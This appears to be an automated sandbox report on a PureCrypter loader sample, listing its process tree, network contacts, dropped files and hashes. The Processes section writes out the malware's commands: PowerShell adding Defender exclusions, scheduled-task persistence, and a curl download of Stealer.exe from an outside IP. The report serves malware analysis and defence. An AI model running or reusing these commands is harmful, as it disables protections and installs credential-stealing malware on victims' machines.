memory/1064-75-0x0000000070540000-0x0000000070AEB000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-25 07:58

Reported

2023-01-25 08:01

Platform

win10v2004-20221111-en

Max time kernel

92s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"

Signatures

PureCrypter

loader downloader purecrypter

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Administrator\Desktop\DROP\noicon.exe N/A
N/A N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation C:\Users\Administrator\Desktop\DROP\Stearler.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Administrator\Desktop\DROP\noicon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4732 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 4732 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 4732 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 4732 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 4732 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 4732 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 4732 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Windows\SYSTEM32\cmd.exe
PID 4732 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Windows\SYSTEM32\cmd.exe
PID 2592 wrote to memory of 3644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2592 wrote to memory of 3644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2592 wrote to memory of 2168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2592 wrote to memory of 2168 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\schtasks.exe
PID 64 wrote to memory of 3456 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 64 wrote to memory of 3456 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 64 wrote to memory of 3456 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 3456 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 3420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3456 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3456 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe

"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"

C:\Users\Administrator\Desktop\DROP\noicon.exe

"C:\Users\Administrator\Desktop\DROP\noicon.exe"

C:\Users\Administrator\Desktop\DROP\Stearler.exe

"C:\Users\Administrator\Desktop\DROP\Stearler.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "testM" /xml "C:\Users\Admin\AppData\Local\Temp\f1.xml"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "test" /xml "C:\Users\Admin\AppData\Local\Temp\f2.xml"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"

C:\Windows\SysWOW64\curl.exe

curl http://140.82.34.147/Stealer.exe -o C:\Users\Public\Downloads\Stealer.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 cents-ability.org udp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 140.82.34.147:80 tcp
N/A 88.221.25.154:80 tcp
N/A 104.80.225.205:443 tcp
N/A 52.178.17.3:443 tcp
N/A 87.248.202.1:80 tcp
N/A 87.248.202.1:80 tcp
N/A 209.197.3.8:80 tcp

Files

memory/4732-132-0x0000000000C30000-0x0000000000D78000-memory.dmp

memory/4732-133-0x000000001C510000-0x000000001C586000-memory.dmp

memory/4732-134-0x00000000015C0000-0x00000000015DE000-memory.dmp

memory/4732-135-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp

memory/4732-136-0x000000001C630000-0x000000001C652000-memory.dmp

memory/1772-137-0x0000000000000000-mapping.dmp

C:\Users\Administrator\Desktop\DROP\noicon.exe

MD5 fdd4cd11d278dab26c2c8551e006c4ed
SHA1 f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA256 80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA512 9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

memory/64-139-0x0000000000000000-mapping.dmp

C:\Users\Administrator\Desktop\DROP\Stearler.exe

MD5 c07c33c5e7c12107f2788280ad31c391
SHA1 8e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256 389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA512 8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

C:\Users\Administrator\Desktop\DROP\Stearler.exe

MD5 c07c33c5e7c12107f2788280ad31c391
SHA1 8e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256 389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA512 8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

C:\Users\Administrator\Desktop\DROP\noicon.exe

MD5 fdd4cd11d278dab26c2c8551e006c4ed
SHA1 f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA256 80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA512 9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

memory/2592-143-0x0000000000000000-mapping.dmp

memory/3644-144-0x0000000000000000-mapping.dmp

memory/4732-145-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp

memory/1772-146-0x0000000000710000-0x0000000000718000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f1.xml

MD5 d5d149b6de60fc4b8ae79a4123955efa
SHA1 9e76a623ff4999c3a0597000fc92d8c16b64b783
SHA256 381a91077f6813b09c642ecc089b362460384e19727adfcf6852121d06965cdf
SHA512 2f3c92063df61b1d3ea186763121b203839c30f2cc528fd7abf9cfffded16144edc98a2e52d331d4975c858081b8067c0ca5c028e21cb8c78cfbda0eb899aca0

memory/2168-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\f2.xml

MD5 bde3b9bcaba83190f1b8793b5997cd00
SHA1 a386e5ef10c24df4c5b667aaaadae8604d6c1efa
SHA256 756ce3e406b95d8c2a88e0a154eb0c7b12fa5f825046d400ff25ccf86dd1decc
SHA512 dae4c9a06e9ba61146ad25ff376690949d9d9a50a8be87ece4c25da63ce47c261737bff8a284e3966b38aa410dfccee8bf6bb38d024a5ac8041e8dc8b55d10cc

memory/3456-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat

MD5 40e65da3d99568737a62d30060539f23
SHA1 c5b616eb054a850b019da2d19e42b82575a269c1
SHA256 a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5
SHA512 ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d

memory/4288-152-0x0000000000000000-mapping.dmp

memory/4288-153-0x0000000002760000-0x0000000002796000-memory.dmp

memory/4288-154-0x0000000005270000-0x0000000005898000-memory.dmp

memory/4288-155-0x0000000005190000-0x00000000051B2000-memory.dmp

memory/4288-156-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/4288-157-0x0000000005A00000-0x0000000005A66000-memory.dmp

memory/4288-158-0x0000000006040000-0x000000000605E000-memory.dmp

memory/4288-159-0x0000000006610000-0x0000000006642000-memory.dmp

memory/4288-160-0x000000006F410000-0x000000006F45C000-memory.dmp

memory/4288-161-0x00000000065C0000-0x00000000065DE000-memory.dmp

memory/4288-162-0x0000000007980000-0x0000000007FFA000-memory.dmp

memory/4288-163-0x0000000007330000-0x000000000734A000-memory.dmp

memory/4288-164-0x0000000007390000-0x000000000739A000-memory.dmp

memory/4288-165-0x00000000075C0000-0x0000000007656000-memory.dmp

memory/4288-166-0x0000000007560000-0x000000000756E000-memory.dmp

memory/4288-167-0x0000000007680000-0x000000000769A000-memory.dmp

memory/4288-168-0x00000000075B0000-0x00000000075B8000-memory.dmp

memory/3420-169-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 443d4812f2139e4bcde2e71bbac34f60
SHA1 0e10245065ef5fe6979b522098d21993b2346c52
SHA256 1fec33ac2be90b663a7d1d530308bc8367b5c932fcc4b0dee550fbb248ec7919
SHA512 e53f16a34651487650156c2c842e8af4fc6d13b1548bc2e665599fb43992a4c22ba6f572bcb44d2a44ac5c7479cc5d7e689a906363436d393e3444f0ecbf3517

memory/3420-172-0x000000006F410000-0x000000006F45C000-memory.dmp

memory/4400-173-0x0000000000000000-mapping.dmp